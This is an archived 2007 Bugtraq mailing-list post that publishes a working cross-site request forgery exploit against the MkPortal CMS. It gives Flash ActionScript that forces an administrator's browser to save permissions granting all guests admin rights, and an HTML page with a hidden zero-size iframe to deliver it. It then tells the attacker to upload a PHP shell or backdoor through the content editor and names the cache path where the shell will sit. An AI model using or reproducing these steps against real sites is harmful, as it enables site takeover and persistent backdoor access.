[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070104040919.27669.qmail@securityfocus.com>
Date: 4 Jan 2007 04:09:19 -0000
From: info@...nhead.it
To: bugtraq@...urityfocus.com
Subject: MkPortal "All Guests are Admin" Exploit
MkPortal "All Guests are Admin" Exploit
Vulnerability discovered and exploited by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it
Start Macromedia Flash and create an swf file with this code:
var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main", "_self", "POST");
Translate "Save+Permissions" in MKPortal language.
Example: "Salva+questi+permessi" for italian sites.
Then upload the swf file to a webserver and create an html page like this:
<html>
<head>
<title>Put a title here</title>
</head>
<body>
<p>Put some text here<p>
<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>
</body>
</html>
Now send the html page to MKPortal administrator.
When admin opens the page all guests will be able to administrate MKPortal.
So you can go here: http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php
and paste a php shell or a backdoor.
You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php
where * is the ID of the page.
Translate "page" in MKPortal language.
Example: "pagina" for italian sites.
Powered by blists - more mailing lists